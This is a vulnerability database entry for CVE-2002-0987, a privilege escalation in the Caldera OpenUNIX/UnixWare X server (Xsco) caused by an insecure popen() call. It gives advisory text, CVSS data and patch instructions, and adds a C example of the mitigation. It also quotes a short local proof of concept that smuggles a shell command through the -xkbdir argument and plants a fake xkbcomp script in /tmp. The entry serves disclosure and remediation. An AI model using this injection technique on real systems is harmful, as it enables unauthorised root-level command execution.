CVE-2002-0987
CVSS 7.2
Published: 2002-09-24 00:00:00
Revised: 2008-09-10 15:13:29

[Original] X server (Xsco) in OpenUNIX 8.0.0 and UnixWare 7.1.1 does not drop privileges before calling programs such as xkbcomp using popen, which could allow local users to gain privileges.


[CNNVD] Open UNIX 8.0.0 UnixWare 7.1.1 X Server insecure popen call vulnerability (CNNVD-200209-066)

        
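        UnixWare/Open UNIX is a commercial UNIX operating system distributed and maintained by Caldera.
        The X Server in UnixWare/Open UNIX calls an insecure system function. A local attacker can exploit this vulnerability to execute arbitrary commands on the system with the privileges of the X Server process.
        According to reports, the X Server in UnixWare/Open UNIX does not drop its special privileges before invoking xkbcomp via the insecure system function popen(). An attacker can submit arbitrary system commands containing metacharacters, so that arbitrary commands run with the privileges of the X Server process, resulting in privilege escalation.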
        

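- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]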

- CPE (affected platforms and products)

cpe:/a:caldera:unixware:7.1.1
cpe:/o:caldera:openunix:8.0

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0987
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0987
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200209-066
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/5575
(UNKNOWN)  BID  5575
http://www.osvdb.org/5044
(UNKNOWN)  OSVDB  5044
http://www.iss.net/security_center/static/9976.php
(UNKNOWN)  XF  openunix-unixware-xsco-privileges(9976)
ftp://ftp.sco.com/pub/updates/OpenUNIX/CSSA-2002-SCO.38
(UNKNOWN)  CALDERA  CSSA-2002-SCO.38

- Vulnerability information

Open UNIX 8.0.0 UnixWare 7.1.1 X Server insecure popen call vulnerability
High risk  Input validation
2002-09-24 00:00:00 2005-05-02 00:00:00
Local
        
        

- Advisories and patches

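        Temporary workaround:
        If you cannot install the patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
        * Tighten local user management. Applying the patch as soon as possible is recommended.
        Vendor patch:
        Caldera
        -------
        Caldera has released a security advisory (CSSA-2002-SCO.38) and corresponding patches for this issue:
        CSSA-2002-SCO.38: Open UNIX 8.0.0 UnixWare 7.1.1 : X server insecure popen and buffer overflow
        Link: ftp://stage.caldera.com/pub/security/openunix/CSSA-2002-SCO.38
        Patch download:
        -Open UNIX 8.0.0
         1. Download the patch from the following address:

         ftp://ftp.sco.com/pub/updates/OpenUNIX/CSSA-2002-SCO.38

         2. Verify it with MD5:

         MD5 (erg711819b.pkg.Z) = 8c06d16b46b7895c545bcdb7c23475d0

         The MD5 tool can be downloaded from the following address:

         ftp://ftp.sco.com/pub/security/tools
         3. Install the patch:

         Download erg711819b.pkg.Z to the /var/spool/pkg directory and run the following:

         # uncompress /var/spool/pkg/erg711819b.pkg.Z
         # pkgadd -d /var/spool/pkg/erg711819b.pkg
        -UnixWare 7.1.1
         1. Download the patch from the following address:

         ftp://ftp.sco.com/pub/updates/OpenUNIX/CSSA-2002-SCO.38

         2. Verify it with MD5:

         MD5 (erg711819b.pkg.Z) = 8c06d16b46b7895c545bcdb7c23475d0

         The MD5 tool can be downloaded from the following address:

         ftp://ftp.sco.com/pub/security/tools
         3. Install the patch:

         Download erg711819b.pkg.Z to the /var/spool/pkg directory and run the following:

         # uncompress /var/spool/pkg/erg711819b.pkg.Z
         # pkgadd -d /var/spool/pkg/erg711819b.pkg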

- Vulnerability information (21758)

Caldera X Server 7.1/8.0 External Program Privileged Invocation Weakness (EDBID:21758)
unix local
2002-08-27 Verified
0 Olaf Kirch
source: http://www.securityfocus.com/bid/5575/info

Caldera's X Server implementation invokes external commands without dropping existing privilege levels. Xserver calls xkbcomp, and other related utilities, in an unsecure manner using the popen() or system() calls. While this would not typically be an issue, as execution of the binary would typically result in the execution of code in the security context of the invoking user, the xkbcomp utility is executed by the Xserver process before privileges are dropped.

This weakness can be exploited by a local attacker to execute arbitrary commands with elevated privileges.

$ Xserver -xkbdir 'id > /tmp/I_WAS_HERE;'
[exit X server]
$ grep root /tmp/I_WAS_HERE && echo 'Gotcha!'

$ cat > /tmp/xkbcomp
#!/bin/sh
id > /tmp/I_WAS_HERE
[ctrl+d]
$ chmod a+x /tmp/xkbcomp
$ Xserver -xkbdir /tmp
[X server executes /tmp/xkbcomp] 		
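
The mitigation pattern for the weakness described above, as an added example (not Xsco source code, and not taken from the vendor patch): a privileged server validates the user-supplied directory, drops privileges permanently in the child, and runs the helper by a fixed absolute path with an argv array instead of a popen()/system() command string. The function names are hypothetical.

```c
/* Added illustration; not Xsco source. Function names are hypothetical. */
#include <ctype.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Accept only an absolute path built from a conservative character set,
 * so a value containing spaces, ';' or '>' never reaches a command line.
 * The result is only ever passed as an argument: the helper binary itself
 * must come from a fixed path, never from this directory. */
int xkbdir_is_safe(const char *dir)
{
    if (dir == NULL || dir[0] != '/' || strstr(dir, "..") != NULL)
        return 0;
    for (const char *p = dir; *p; p++)
        if (!isalnum((unsigned char)*p) && strchr("/._-", *p) == NULL)
            return 0;
    return 1;
}

/* Run a helper by absolute path with an argv array (no shell, no PATH
 * lookup) after permanently dropping set-id privileges in the child.
 * Returns the helper's exit status, 127 if exec failed, 126 if the
 * privilege drop failed, -1 on fork/wait error. */
int run_helper_unprivileged(const char *abs_path, char *const argv[])
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* Group first: after setuid() we may no longer be allowed to. */
        if (setgid(getgid()) != 0 || setuid(getuid()) != 0)
            _exit(126);
        /* A non-root invoker must not be able to regain root. */
        if (getuid() != 0 && setuid(0) == 0)
            _exit(126);
        execv(abs_path, argv);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```
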

- Vulnerability information

5044
OpenUNIX Xsco xkbcomp Unspecified Privilege Escalation
Local Access Required Input Manipulation, Other
Loss of Integrity
Exploit Public

- Vulnerability description

SCO OpenUnix and UnixWare contain a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when SCO Xserver (Xsco) fails to properly drop privileges when invoking external commands. This flaw may lead to a loss of integrity.

- Timeline

2002-08-27 Unknown
1998-02-03 Unknown

- Solution

Apply SCO hotfixes described in security advisory CSSA-2002-SCO.38, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.
